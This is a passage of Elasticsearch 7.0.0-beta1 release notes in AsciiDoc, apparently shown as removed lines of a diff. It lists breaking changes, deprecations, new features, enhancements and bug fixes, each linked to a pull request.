-[[breaking-java-7.0.0-beta1]] -[discrete] -=== Breaking Java changes - -Features/Java Low Level REST Client:: -* Remove support for maxRetryTimeout from low-level REST client {es-pull}38085[#38085] (issues: {es-issue}25951[#25951], {es-issue}31834[#31834], {es-issue}33342[#33342]) - -Infra/Core:: -* Handle scheduler exceptions {es-pull}38014[#38014] (issues: {es-issue}28667[#28667], {es-issue}36137[#36137], {es-issue}37708[#37708]) - - - -[[deprecation-7.0.0-beta1]] -[discrete] -=== Deprecations - -Aggregations:: -* Deprecate dots in aggregation names {es-pull}31468[#31468] (issues: {es-issue}17600[#17600], {es-issue}19040[#19040]) - -Analysis:: -* [Analysis] Deprecate Standard Html Strip Analyzer in master {es-pull}26719[#26719] (issue: {es-issue}4704[#4704]) - -Audit:: -* Deprecate index audit output type {es-pull}37301[#37301] (issue: {es-issue}29881[#29881]) - -Features/Indices APIs:: -* Reject setting index.optimize_auto_generated_id after version 7.0.0 {es-pull}28895[#28895] (issue: {es-issue}27600[#27600]) - -Features/Ingest:: -* Deprecate `_type` in simulate pipeline requests {es-pull}37949[#37949] (issue: {es-issue}37731[#37731]) - -Features/Java High Level REST Client:: -* Deprecate HLRC security methods {es-pull}37883[#37883] (issues: {es-issue}36938[#36938], {es-issue}37540[#37540]) -* Deprecate HLRC EmptyResponse used by security {es-pull}37540[#37540] (issue: {es-issue}36938[#36938]) - -Features/Watcher:: -* Deprecate xpack.watcher.history.cleaner_service.enabled {es-pull}37782[#37782] (issue: {es-issue}32041[#32041]) -* deprecate types for watcher {es-pull}37594[#37594] (issue: {es-issue}35190[#35190]) - -Infra/Core:: -* Core: Deprecate negative epoch timestamps {es-pull}36793[#36793] -* Core: Deprecate use of scientific notation in epoch time parsing {es-pull}36691[#36691] - -Infra/Scripting:: -* Add types deprecation to script contexts {es-pull}37554[#37554] -* Deprecate _type from LeafDocLookup {es-pull}37491[#37491] -* Scripting: Remove deprecated params.ctx {es-pull}36848[#36848] (issue: {es-issue}34059[#34059]) - -Machine Learning:: -* Adding ml_settings entry to HLRC and Docs for deprecation_info {es-pull}38118[#38118] -* [ML] Datafeed deprecation checks {es-pull}38026[#38026] (issue: {es-issue}37932[#37932]) -* [ML] Remove "8" prefixes from file structure finder timestamp formats {es-pull}38016[#38016] -* [ML] Adjust structure finder for Joda to Java time migration {es-pull}37306[#37306] -* [ML] Resolve 7.0.0 TODOs in ML code {es-pull}36842[#36842] (issue: {es-issue}29963[#29963]) - -Mapping:: -* Deprecate types in rollover index API {es-pull}38039[#38039] (issue: {es-issue}35190[#35190]) -* Deprecate types in get field mapping API {es-pull}37667[#37667] (issue: {es-issue}35190[#35190]) -* Deprecate types in the put mapping API. {es-pull}37280[#37280] (issues: {es-issue}29453[#29453], {es-issue}37285[#37285]) -* Support include_type_name in the field mapping and index template APIs. {es-pull}37210[#37210] -* Deprecate types in create index requests. {es-pull}37134[#37134] (issues: {es-issue}29453[#29453], {es-issue}37285[#37285]) -* Deprecate use of the _type field in aggregations. {es-pull}37131[#37131] (issue: {es-issue}36802[#36802]) -* Deprecate reference to _type in lookup queries {es-pull}37016[#37016] (issue: {es-issue}35190[#35190]) -* Deprecate the document create endpoint. {es-pull}36863[#36863] -* Deprecate types in index API {es-pull}36575[#36575] (issues: {es-issue}35190[#35190], {es-issue}35790[#35790]) -* Deprecate types in update APIs {es-pull}36225[#36225] - -Search:: -* Deprecate use of type in reindex request body {es-pull}36823[#36823] -* Add typless endpoints for get_source and exist_source {es-pull}36426[#36426] - - - -[[feature-7.0.0-beta1]] -[discrete] -=== New features - -Authentication:: -* Add support for API keys to access Elasticsearch {es-pull}38291[#38291] (issue: {es-issue}34383[#34383]) -* OIDC realm authentication flows {es-pull}37787[#37787] -* [WIP] OIDC Realm JWT+JWS related functionality {es-pull}37272[#37272] (issues: {es-issue}35339[#35339], {es-issue}37009[#37009]) -* OpenID Connect Realm base functionality {es-pull}37009[#37009] (issue: {es-issue}35339[#35339]) - -Authorization:: -* Allow custom authorization with an authorization engine {es-pull}38358[#38358] (issues: {es-issue}32435[#32435], {es-issue}36245[#36245], {es-issue}37328[#37328], {es-issue}37495[#37495], {es-issue}37785[#37785], {es-issue}38137[#38137], {es-issue}38219[#38219]) -* WIldcard IndicesPermissions don't cover .security {es-pull}36765[#36765] - -CCR:: -* Add ccr follow info api {es-pull}37408[#37408] (issue: {es-issue}37127[#37127]) - -Features/ILM:: -* [ILM] Add unfollow action {es-pull}36970[#36970] (issue: {es-issue}34648[#34648]) - -Geo:: -* geotile_grid implementation {es-pull}37842[#37842] (issue: {es-issue}30240[#30240]) -* [GEO] Fork Lucene's LatLonShape Classes to local lucene package {es-pull}36794[#36794] -* [Geo] Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}36751[#36751] (issue: {es-issue}35320[#35320]) -* [Geo] Integrate Lucene's LatLonShape (BKD Backed GeoShapes) as default `geo_shape` indexing approach {es-pull}35320[#35320] (issue: {es-issue}32039[#32039]) - -Machine Learning:: -* ML: Adds set_upgrade_mode API endpoint {es-pull}37837[#37837] - -Mapping:: -* Give precedence to index creation when mixing typed templates with typeless index creation and vice-versa. {es-pull}37871[#37871] (issue: {es-issue}37773[#37773]) -* Add nanosecond field mapper {es-pull}37755[#37755] (issues: {es-issue}27330[#27330], {es-issue}32601[#32601]) - -SQL:: -* SQL: Allow sorting of groups by aggregates {es-pull}38042[#38042] (issue: {es-issue}35118[#35118]) -* SQL: Implement FIRST/LAST aggregate functions {es-pull}37936[#37936] (issue: {es-issue}35639[#35639]) -* SQL: Introduce SQL DATE data type {es-pull}37693[#37693] (issue: {es-issue}37340[#37340]) - -Search:: -* Introduce ability to minimize round-trips in CCS {es-pull}37828[#37828] (issues: {es-issue}32125[#32125], {es-issue}37566[#37566]) -* Add script filter to intervals {es-pull}36776[#36776] -* Add the ability to set the number of hits to track accurately {es-pull}36357[#36357] (issue: {es-issue}33028[#33028]) -* Add a maximum search request size. {es-pull}26423[#26423] - - - -[[enhancement-7.0.0-beta1]] -[discrete] -=== Enhancements - -Aggregations:: -* Add Composite to AggregationBuilders {es-pull}38207[#38207] (issue: {es-issue}38020[#38020]) -* Allow nested fields in the composite aggregation {es-pull}37178[#37178] (issue: {es-issue}28611[#28611]) -* Remove single shard optimization when suggesting shard_size {es-pull}37041[#37041] (issue: {es-issue}32125[#32125]) -* Use List instead of priority queue for stable sorting in bucket sort aggregator {es-pull}36748[#36748] (issue: {es-issue}36322[#36322]) -* Keys are compared in BucketSortPipelineAggregation so making key type… {es-pull}36407[#36407] - -Allocation:: -* Fail start on obsolete indices documentation {es-pull}37786[#37786] (issue: {es-issue}27073[#27073]) -* Fail start on invalid index metadata {es-pull}37748[#37748] (issue: {es-issue}27073[#27073]) -* Fail start of non-data node if node has data {es-pull}37347[#37347] (issue: {es-issue}27073[#27073]) - -Analysis:: -* Allow word_delimiter_graph_filter to not adjust internal offsets {es-pull}36699[#36699] (issues: {es-issue}33710[#33710], {es-issue}34741[#34741]) - -Audit:: -* Security Audit includes HTTP method for requests {es-pull}37322[#37322] (issue: {es-issue}29765[#29765]) -* Add X-Forwarded-For to the logfile audit {es-pull}36427[#36427] - -Authentication:: -* Security: propagate auth result to listeners {es-pull}36900[#36900] (issue: {es-issue}30794[#30794]) -* Security: reorder realms based on last success {es-pull}36878[#36878] -* Improve error message for 6.x style realm settings {es-pull}36876[#36876] (issues: {es-issue}30241[#30241], {es-issue}36026[#36026]) -* Change missing authn message to not mention tokens {es-pull}36750[#36750] -* Invalidate Token API enhancements - HLRC {es-pull}36362[#36362] (issue: {es-issue}35388[#35388]) -* Enhance Invalidate Token API {es-pull}35388[#35388] (issues: {es-issue}34556[#34556], {es-issue}35115[#35115]) - -Authorization:: -* Add apm_user reserved role {es-pull}38206[#38206] -* Permission for restricted indices {es-pull}37577[#37577] (issue: {es-issue}34454[#34454]) -* Remove kibana_user and kibana_dashboard_only_user index privileges {es-pull}37441[#37441] -* Create snapshot role {es-pull}35820[#35820] (issue: {es-issue}34454[#34454]) - -CCR:: -* Concurrent file chunk fetching for CCR restore {es-pull}38495[#38495] -* Tighten mapping syncing in ccr remote restore {es-pull}38071[#38071] (issues: {es-issue}36879[#36879], {es-issue}37887[#37887]) -* Do not allow put mapping on follower {es-pull}37675[#37675] (issue: {es-issue}30086[#30086]) -* Added ccr to xpack usage infrastructure {es-pull}37256[#37256] (issue: {es-issue}37221[#37221]) -* [CCR] FollowingEngine should fail with 403 if operation has no seqno assigned {es-pull}37213[#37213] -* [CCR] Added auto_follow_exception.timestamp field to auto follow stats {es-pull}36947[#36947] -* [CCR] Add time since last auto follow fetch to auto follow stats {es-pull}36542[#36542] (issues: {es-issue}33007[#33007], {es-issue}35895[#35895]) - -CRUD:: -* Add Seq# based optimistic concurrency control to UpdateRequest {es-pull}37872[#37872] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Introduce ssl settings to reindex from remote {es-pull}37527[#37527] (issues: {es-issue}29755[#29755], {es-issue}37287[#37287]) -* Use Sequence number powered OCC for processing updates {es-pull}37308[#37308] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Document Seq No powered optimistic concurrency control {es-pull}37284[#37284] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Enable IPv6 URIs in reindex from remote {es-pull}36874[#36874] -* Rename seq# powered optimistic concurrency control parameters to ifSeqNo/ifPrimaryTerm {es-pull}36757[#36757] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Expose Sequence Number based Optimistic Concurrency Control in the rest layer {es-pull}36721[#36721] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add doc's sequence number + primary term to GetResult and use it for updates {es-pull}36680[#36680] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Add seq no powered optimistic locking support to the index and delete transport actions {es-pull}36619[#36619] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* Set acking timeout to 0 on dynamic mapping update {es-pull}31140[#31140] (issues: {es-issue}30672[#30672], {es-issue}30844[#30844]) - -Distributed:: -* Recover retention leases during peer recovery {es-pull}38435[#38435] (issue: {es-issue}37165[#37165]) -* Lift retention lease expiration to index shard {es-pull}38380[#38380] (issues: {es-issue}37165[#37165], {es-issue}37963[#37963], {es-issue}38070[#38070]) -* Introduce retention lease background sync {es-pull}38262[#38262] (issue: {es-issue}37165[#37165]) -* Allow shards of closed indices to be replicated as regular shards {es-pull}38024[#38024] (issue: {es-issue}33888[#33888]) -* Expose retention leases in shard stats {es-pull}37991[#37991] (issue: {es-issue}37165[#37165]) -* Introduce retention leases versioning {es-pull}37951[#37951] (issue: {es-issue}37165[#37165]) -* Soft-deletes policy should always fetch latest leases {es-pull}37940[#37940] (issues: {es-issue}37165[#37165], {es-issue}37375[#37375]) -* Sync retention leases on expiration {es-pull}37902[#37902] (issue: {es-issue}37165[#37165]) -* Ignore shard started requests when primary term does not match {es-pull}37899[#37899] (issue: {es-issue}33888[#33888]) -* Move update and delete by query to use seq# for optimistic concurrency control {es-pull}37857[#37857] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148], {es-issue}37639[#37639]) -* Introduce retention lease serialization {es-pull}37447[#37447] (issues: {es-issue}37165[#37165], {es-issue}37398[#37398]) -* Add run under primary permit method {es-pull}37440[#37440] (issue: {es-issue}37398[#37398]) -* Introduce retention lease syncing {es-pull}37398[#37398] (issue: {es-issue}37165[#37165]) -* Introduce retention lease persistence {es-pull}37375[#37375] (issue: {es-issue}37165[#37165]) -* Add validation for retention lease construction {es-pull}37312[#37312] (issue: {es-issue}37165[#37165]) -* Introduce retention lease expiration {es-pull}37195[#37195] (issue: {es-issue}37165[#37165]) -* Introduce shard history retention leases {es-pull}37167[#37167] (issue: {es-issue}37165[#37165]) -* [Close Index API] Add unique UUID to ClusterBlock {es-pull}36775[#36775] -* [Close Index API] Mark shard copy as stale if needed during shard verification {es-pull}36755[#36755] -* [Close Index API] Propagate tasks ids between Freeze, Close and Verify Shard actions {es-pull}36630[#36630] -* Always initialize the global checkpoint {es-pull}34381[#34381] - -Engine:: -* Specialize pre-closing checks for engine implementations {es-pull}38702[#38702] -* Ensure that max seq # is equal to the global checkpoint when creating ReadOnlyEngines {es-pull}37426[#37426] -* Enable Bulk-Merge if all source remains {es-pull}37269[#37269] -* Rename setting to enable mmap {es-pull}37070[#37070] (issue: {es-issue}36668[#36668]) -* Add hybridfs store type {es-pull}36668[#36668] -* Introduce time-based retention policy for soft-deletes {es-pull}34943[#34943] (issue: {es-issue}34908[#34908]) -* handle AsyncAfterWriteAction failure on primary in the same way as failures on replicas {es-pull}31969[#31969] (issues: {es-issue}31716[#31716], {es-issue}31755[#31755]) - -Features/CAT APIs:: -* Expose `search.throttled` on `_cat/indices` {es-pull}37073[#37073] (issue: {es-issue}34352[#34352]) - -Features/Features:: -* Run Node deprecation checks locally (#38065) {es-pull}38250[#38250] (issue: {es-issue}38065[#38065]) - -Features/ILM:: -* Ensure ILM policies run safely on leader indices {es-pull}38140[#38140] (issue: {es-issue}34648[#34648]) -* Skip Shrink when numberOfShards not changed {es-pull}37953[#37953] (issue: {es-issue}33275[#33275]) -* Inject Unfollow before Rollover and Shrink {es-pull}37625[#37625] (issue: {es-issue}34648[#34648]) -* Add set_priority action to ILM {es-pull}37397[#37397] (issue: {es-issue}36905[#36905]) -* [ILM] Add Freeze Action {es-pull}36910[#36910] (issue: {es-issue}34630[#34630]) - -Features/Indices APIs:: -* New mapping signature and mapping string source fixed. {es-pull}37401[#37401] - -Features/Ingest:: -* ingest: compile mustache template only if field includes '{{'' {es-pull}37207[#37207] (issue: {es-issue}37120[#37120]) -* Move ingest-geoip default databases out of config {es-pull}36949[#36949] (issue: {es-issue}36898[#36898]) -* Make the ingest-geoip databases even lazier to load {es-pull}36679[#36679] -* Updates the grok patterns to be consistent with the logstash {es-pull}27181[#27181] - -Features/Java High Level REST Client:: -* HLRC: Fix strict setting exception handling {es-pull}37247[#37247] (issue: {es-issue}37090[#37090]) -* HLRC: Use nonblocking entity for requests {es-pull}32249[#32249] - -Features/Monitoring:: -* Adding mapping for hostname field {es-pull}37288[#37288] - -Features/Stats:: -* Stats: Add JVM dns cache expiration config to JvmInfo {es-pull}36372[#36372] - -Features/Watcher:: -* Move watcher to use seq# and primary term for concurrency control {es-pull}37977[#37977] (issues: {es-issue}10708[#10708], {es-issue}37872[#37872]) -* Use ILM for Watcher history deletion {es-pull}37443[#37443] (issue: {es-issue}32041[#32041]) -* Watcher: Add whitelist to HttpClient {es-pull}36817[#36817] (issue: {es-issue}29937[#29937]) - -Infra/Core:: -* fix a few versionAdded values in ElasticsearchExceptions {es-pull}37877[#37877] -* Add simple method to write collection of writeables {es-pull}37448[#37448] (issue: {es-issue}37398[#37398]) -* Date/Time parsing: Use java time API instead of exception handling {es-pull}37222[#37222] -* [API] spelling: interruptible {es-pull}37049[#37049] (issue: {es-issue}37035[#37035]) - -Infra/Logging:: -* Trim the JSON source in indexing slow logs {es-pull}38081[#38081] (issue: {es-issue}38080[#38080]) -* Optimize warning header de-duplication {es-pull}37725[#37725] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530], {es-issue}37597[#37597], {es-issue}37622[#37622]) -* Remove warn-date from warning headers {es-pull}37622[#37622] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530], {es-issue}37597[#37597]) -* Add some deprecation optimizations {es-pull}37597[#37597] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530]) -* Only update response headers if we have a new one {es-pull}37590[#37590] (issues: {es-issue}35754[#35754], {es-issue}37530[#37530]) - -Infra/Packaging:: -* Add OS/architecture classifier to distributions {es-pull}37881[#37881] -* Change file descriptor limit to 65535 {es-pull}37537[#37537] (issue: {es-issue}35839[#35839]) -* Exit batch files explictly using ERRORLEVEL {es-pull}29583[#29583] (issue: {es-issue}29582[#29582]) - -Infra/Scripting:: -* Add getZone to JodaCompatibleZonedDateTime {es-pull}37084[#37084] -* [Painless] Add boxed type to boxed type casts for method/return {es-pull}36571[#36571] - -Infra/Settings:: -* Separate out validation of groups of settings {es-pull}34184[#34184] - -License:: -* Handle malformed license signatures {es-pull}37137[#37137] (issue: {es-issue}35340[#35340]) - -Machine Learning:: -* Move ML Optimistic Concurrency Control to Seq No {es-pull}38278[#38278] (issues: {es-issue}10708[#10708], {es-issue}36148[#36148]) -* [ML] Add explanation so far to file structure finder exceptions {es-pull}38191[#38191] (issue: {es-issue}29821[#29821]) -* ML: Add reason field in JobTaskState {es-pull}38029[#38029] (issue: {es-issue}34431[#34431]) -* [ML] Add _meta information to all ML indices {es-pull}37964[#37964] -* ML: Add upgrade mode docs, hlrc, and fix bug {es-pull}37942[#37942] -* [ML] Tighten up use of aliases rather than concrete indices {es-pull}37874[#37874] -* ML: Add support for single bucket aggs in Datafeeds {es-pull}37544[#37544] (issue: {es-issue}36838[#36838]) -* [ML] Create the ML annotations index {es-pull}36731[#36731] (issues: {es-issue}26034[#26034], {es-issue}33376[#33376]) -* [ML] Merge the Jindex master feature branch {es-pull}36702[#36702] (issue: {es-issue}32905[#32905]) -* [FEATURE][ML] Add cluster setting to enable/disable config migration {es-pull}36700[#36700] (issue: {es-issue}32905[#32905]) - -Mapping:: -* Log document id when MapperParsingException occurs {es-pull}37800[#37800] (issue: {es-issue}37658[#37658]) -* [API] spelling: unknown {es-pull}37056[#37056] (issue: {es-issue}37035[#37035]) -* Make SourceToParse immutable {es-pull}36971[#36971] -* Use index-prefix fields for terms of length min_chars - 1 {es-pull}36703[#36703] - -Network:: -* Enable TLSv1.3 by default for JDKs with support {es-pull}38103[#38103] (issue: {es-issue}32276[#32276]) - -Recovery:: -* SyncedFlushService.getShardRoutingTable() should use metadata to check for index existence {es-pull}37691[#37691] (issue: {es-issue}33888[#33888]) -* Make prepare engine step of recovery source non-blocking {es-pull}37573[#37573] (issue: {es-issue}37174[#37174]) -* Make recovery source send operations non-blocking {es-pull}37503[#37503] (issue: {es-issue}37458[#37458]) -* Prepare to make send translog of recovery non-blocking {es-pull}37458[#37458] (issue: {es-issue}37291[#37291]) -* Make finalize step of recovery source non-blocking {es-pull}37388[#37388] (issue: {es-issue}37291[#37291]) -* Make recovery source partially non-blocking {es-pull}37291[#37291] (issue: {es-issue}36195[#36195]) -* Do not mutate RecoveryResponse {es-pull}37204[#37204] (issue: {es-issue}37174[#37174]) -* Don't block on peer recovery on the target side {es-pull}37076[#37076] (issue: {es-issue}36195[#36195]) -* Reduce recovery time with compress or secure transport {es-pull}36981[#36981] (issue: {es-issue}33844[#33844]) -* Translog corruption marker {es-pull}33415[#33415] (issue: {es-issue}31389[#31389]) - -Rollup:: -* Replace the TreeMap in the composite aggregation {es-pull}36675[#36675] - -SQL:: -* SQL: Allow look-ahead resolution of aliases for WHERE clause {es-pull}38450[#38450] (issue: {es-issue}29983[#29983]) -* SQL: Implement CURRENT_DATE {es-pull}38175[#38175] (issue: {es-issue}38160[#38160]) -* SQL: Generate relevant error message when grouping functions are not used in GROUP BY {es-pull}38017[#38017] (issue: {es-issue}37952[#37952]) -* SQL: Skip the nested and object field types in case of an ODBC request {es-pull}37948[#37948] (issue: {es-issue}37801[#37801]) -* SQL: Add protocol tests and remove jdbc_type from drivers response {es-pull}37516[#37516] (issues: {es-issue}36635[#36635], {es-issue}36882[#36882]) -* SQL: Remove slightly used meta commands {es-pull}37506[#37506] (issue: {es-issue}37409[#37409]) -* SQL: Describe aliases as views {es-pull}37496[#37496] (issue: {es-issue}37422[#37422]) -* SQL: Make `FULL` non-reserved keyword in the grammar {es-pull}37377[#37377] (issue: {es-issue}37376[#37376]) -* SQL: Use declared source for error messages {es-pull}37161[#37161] -* SQL: Improve error message when unable to translate to ES query DSL {es-pull}37129[#37129] (issue: {es-issue}37040[#37040]) -* [API] spelling: subtract {es-pull}37055[#37055] (issue: {es-issue}37035[#37035]) -* [API] spelling: similar {es-pull}37054[#37054] (issue: {es-issue}37035[#37035]) -* [API] spelling: input {es-pull}37048[#37048] (issue: {es-issue}37035[#37035]) -* SQL: Enhance message for PERCENTILE[_RANK] with field as 2nd arg {es-pull}36933[#36933] (issue: {es-issue}36903[#36903]) -* SQL: Preserve original source for each expression {es-pull}36912[#36912] (issue: {es-issue}36894[#36894]) -* SQL: Extend the ODBC metric by differentiating between 32 and 64bit platforms {es-pull}36753[#36753] (issue: {es-issue}36740[#36740]) -* SQL: Fix wrong appliance of StackOverflow limit for IN {es-pull}36724[#36724] (issue: {es-issue}36592[#36592]) - -Search:: -* Tie break on cluster alias when merging shard search failures {es-pull}38715[#38715] (issue: {es-issue}38672[#38672]) -* Add finalReduce flag to SearchRequest {es-pull}38104[#38104] (issues: {es-issue}37000[#37000], {es-issue}37838[#37838]) -* Streamline skip_unavailable handling {es-pull}37672[#37672] (issue: {es-issue}32125[#32125]) -* Expose sequence number and primary terms in search responses {es-pull}37639[#37639] -* Add support for merging multiple search responses into one {es-pull}37566[#37566] (issue: {es-issue}32125[#32125]) -* Allow field types to optimize phrase prefix queries {es-pull}37436[#37436] (issue: {es-issue}31921[#31921]) -* Add support for providing absolute start time to SearchRequest {es-pull}37142[#37142] (issue: {es-issue}32125[#32125]) -* Ensure that local cluster alias is never treated as remote {es-pull}37121[#37121] (issues: {es-issue}32125[#32125], {es-issue}36997[#36997]) -* [API] spelling: cacheable {es-pull}37047[#37047] (issue: {es-issue}37035[#37035]) -* Add ability to suggest shard_size on coord node rewrite {es-pull}37017[#37017] (issues: {es-issue}32125[#32125], {es-issue}36997[#36997], {es-issue}37000[#37000]) -* Skip final reduction if SearchRequest holds a cluster alias {es-pull}37000[#37000] (issues: {es-issue}32125[#32125], {es-issue}36997[#36997]) -* Add support for local cluster alias to SearchRequest {es-pull}36997[#36997] (issue: {es-issue}32125[#32125]) -* Use SearchRequest copy constructor in ExpandSearchPhase {es-pull}36772[#36772] (issue: {es-issue}36641[#36641]) -* Add raw sort values to SearchSortValues transport serialization {es-pull}36617[#36617] (issue: {es-issue}32125[#32125]) - -Security:: -* Move CAS operations in TokenService to sequence numbers {es-pull}38311[#38311] (issues: {es-issue}10708[#10708], {es-issue}37872[#37872]) -* Cleanup construction of interceptors {es-pull}38294[#38294] -* Add passphrase support to elasticsearch-keystore {es-pull}37472[#37472] (issue: {es-issue}32691[#32691]) - -Snapshot/Restore:: -* RestoreService should update primary terms when restoring shards of existing indices {es-pull}38177[#38177] (issue: {es-issue}33888[#33888]) -* Allow open indices to be restored {es-pull}37733[#37733] -* Create specific exception for when snapshots are in progress {es-pull}37550[#37550] (issue: {es-issue}37541[#37541]) -* SNAPSHOT: Make Atomic Blob Writes Mandatory {es-pull}37168[#37168] (issues: {es-issue}37011[#37011], {es-issue}37066[#37066]) -* SNAPSHOT: Speed up HDFS Repository Writes {es-pull}37069[#37069] -* Implement Atomic Blob Writes for HDFS Repository {es-pull}37066[#37066] (issue: {es-issue}37011[#37011]) -* [API] spelling: repositories {es-pull}37053[#37053] (issue: {es-issue}37035[#37035]) -* SNAPSHOT: Use CancellableThreads to Abort {es-pull}35901[#35901] (issue: {es-issue}21759[#21759]) -* WIP: S3 client encryption {es-pull}30513[#30513] (issues: {es-issue}11128[#11128], {es-issue}16843[#16843]) - -Suggesters:: -* Remove unused empty constructors from suggestions classes {es-pull}37295[#37295] -* [API] spelling: likelihood {es-pull}37052[#37052] (issue: {es-issue}37035[#37035]) - -ZenDiscovery:: -* Add elasticsearch-node detach-cluster tool {es-pull}37979[#37979] -* Deprecate minimum_master_nodes {es-pull}37868[#37868] -* Step down as master when configured out of voting configuration {es-pull}37802[#37802] (issue: {es-issue}37712[#37712]) -* Enforce cluster UUIDs {es-pull}37775[#37775] -* Bubble exceptions up in ClusterApplierService {es-pull}37729[#37729] -* Use m_m_nodes from Zen1 master for Zen2 bootstrap {es-pull}37701[#37701] -* Add tool elasticsearch-node unsafe-bootstrap {es-pull}37696[#37696] -* Report terms and version if cluster does not form {es-pull}37473[#37473] -* Bootstrap a Zen2 cluster once quorum is discovered {es-pull}37463[#37463] -* Zen2: Add join validation {es-pull}37203[#37203] -* Publish cluster states in chunks {es-pull}36973[#36973] - - - -[[bug-7.0.0-beta1]] -[discrete] -=== Bug fixes - -Aggregations:: -* Don't load global ordinals with the `map` execution_hint {es-pull}37833[#37833] (issue: {es-issue}37705[#37705]) -* Issue #37303 - Invalid variance fix {es-pull}37384[#37384] (issue: {es-issue}37303[#37303]) - -Allocation:: -* Fix _host based require filters {es-pull}38173[#38173] -* ALLOC: Fail Stale Primary Alloc. Req. without Data {es-pull}37226[#37226] (issue: {es-issue}37098[#37098]) - -Audit:: -* Fix NPE in Logfile Audit Filter {es-pull}38120[#38120] (issue: {es-issue}38097[#38097]) - -Authentication:: -* Enhance parsing of StatusCode in SAML Responses {es-pull}38628[#38628] -* Limit token expiry to 1 hour maximum {es-pull}38244[#38244] -* Fix expired token message in Exception header {es-pull}37196[#37196] -* Fix NPE in CachingUsernamePasswordRealm {es-pull}36953[#36953] (issue: {es-issue}36951[#36951]) - -CCR:: -* Prevent CCR recovery from missing documents {es-pull}38237[#38237] -* Fix file reading in ccr restore service {es-pull}38117[#38117] -* Correct argument names in update mapping/settings from leader {es-pull}38063[#38063] -* Ensure changes requests return the latest mapping version {es-pull}37633[#37633] -* Do not set fatal exception when shard follow task is stopped. {es-pull}37603[#37603] -* Add fatal_exception field for ccr stats in monitoring mapping {es-pull}37563[#37563] -* Do not add index event listener if CCR disabled {es-pull}37432[#37432] -* When removing an AutoFollower also mark it as removed. {es-pull}37402[#37402] (issue: {es-issue}36761[#36761]) -* [CCR] Make shard follow tasks more resilient for restarts {es-pull}37239[#37239] (issue: {es-issue}37231[#37231]) -* [CCR] Resume follow Api should not require a request body {es-pull}37217[#37217] (issue: {es-issue}37022[#37022]) -* [CCR] Report error if auto follower tries auto follow a leader index with soft deletes disabled {es-pull}36886[#36886] (issue: {es-issue}33007[#33007]) -* Remote cluster license checker and no license info. {es-pull}36837[#36837] (issue: {es-issue}36815[#36815]) -* Make CCR resilient against missing remote cluster connections {es-pull}36682[#36682] (issues: {es-issue}36255[#36255], {es-issue}36667[#36667]) -* [CCR] AutoFollowCoordinator and follower index already created {es-pull}36540[#36540] (issue: {es-issue}33007[#33007]) - -CRUD:: -* Fix Reindex from remote query logic {es-pull}36908[#36908] -* Synchronize WriteReplicaResult callbacks {es-pull}36770[#36770] - -Distributed:: -* TransportVerifyShardBeforeCloseAction should force a flush {es-pull}38401[#38401] (issues: {es-issue}33888[#33888], {es-issue}37961[#37961]) -* Fix limit on retaining sequence number {es-pull}37992[#37992] (issue: {es-issue}37165[#37165]) -* Close Index API should force a flush if a sync is needed {es-pull}37961[#37961] (issues: {es-issue}33888[#33888], {es-issue}37426[#37426]) -* Force Refresh Listeners when Acquiring all Operation Permits {es-pull}36835[#36835] -* Replaced the word 'shards' with 'replicas' in an error message. (#36234) {es-pull}36275[#36275] (issue: {es-issue}36234[#36234]) - -Engine:: -* Subclass NIOFSDirectory instead of using FileSwitchDirectory {es-pull}37140[#37140] (issues: {es-issue}36668[#36668], {es-issue}37111[#37111]) - -Features/ILM:: -* Preserve ILM operation mode when creating new lifecycles {es-pull}38134[#38134] (issues: {es-issue}38229[#38229], {es-issue}38230[#38230]) -* Retry ILM steps that fail due to SnapshotInProgressException {es-pull}37624[#37624] (issues: {es-issue}37541[#37541], {es-issue}37552[#37552]) -* Remove `indexing_complete` when removing policy {es-pull}36620[#36620] - -Features/Indices APIs:: -* Reject delete index requests with a body {es-pull}37501[#37501] (issue: {es-issue}8217[#8217]) -* Fix duplicate phrase in shrink/split error message {es-pull}36734[#36734] (issue: {es-issue}36729[#36729]) -* Get Aliases with wildcard exclusion expression {es-pull}34230[#34230] (issues: {es-issue}33518[#33518], {es-issue}33805[#33805], {es-issue}34144[#34144]) - -Features/Ingest:: -* Support unknown fields in ingest pipeline map configuration {es-pull}38352[#38352] (issue: {es-issue}36938[#36938]) -* Ingest node - user_agent, move device parsing to an object {es-pull}38115[#38115] (issues: {es-issue}37329[#37329], {es-issue}38094[#38094]) -* ingest: fix on_failure with Drop processor {es-pull}36686[#36686] (issue: {es-issue}36151[#36151]) -* ingest: support default pipelines + bulk upserts {es-pull}36618[#36618] (issue: {es-issue}36219[#36219]) - -Features/Java High Level REST Client:: -* Update IndexTemplateMetadata to allow unknown fields {es-pull}38448[#38448] (issue: {es-issue}36938[#36938]) -* `if_seq_no` and `if_primary_term` parameters aren't wired correctly in REST Client's CRUD API {es-pull}38411[#38411] -* Update Rollup Caps to allow unknown fields {es-pull}38339[#38339] (issue: {es-issue}36938[#36938]) -* Fix ILM explain response to allow unknown fields {es-pull}38054[#38054] (issue: {es-issue}36938[#36938]) -* Fix ILM status to allow unknown fields {es-pull}38043[#38043] (issue: {es-issue}36938[#36938]) -* Fix ILM Lifecycle Policy to allow unknown fields {es-pull}38041[#38041] (issue: {es-issue}36938[#36938]) -* Update authenticate to allow unknown fields {es-pull}37713[#37713] (issue: {es-issue}36938[#36938]) -* Update verify repository to allow unknown fields {es-pull}37619[#37619] (issue: {es-issue}36938[#36938]) -* Update get users to allow unknown fields {es-pull}37593[#37593] (issue: {es-issue}36938[#36938]) -* Update Execute Watch to allow unknown fields {es-pull}37498[#37498] (issue: {es-issue}36938[#36938]) -* Update Put Watch to allow unknown fields {es-pull}37494[#37494] (issue: {es-issue}36938[#36938]) -* Update Delete Watch to allow unknown fields {es-pull}37435[#37435] (issue: {es-issue}36938[#36938]) -* Fix rest reindex test for IPv4 addresses {es-pull}37310[#37310] -* Fix weighted_avg parser not found for RestHighLevelClient {es-pull}37027[#37027] (issue: {es-issue}36861[#36861]) - -Features/Java Low Level REST Client:: -* 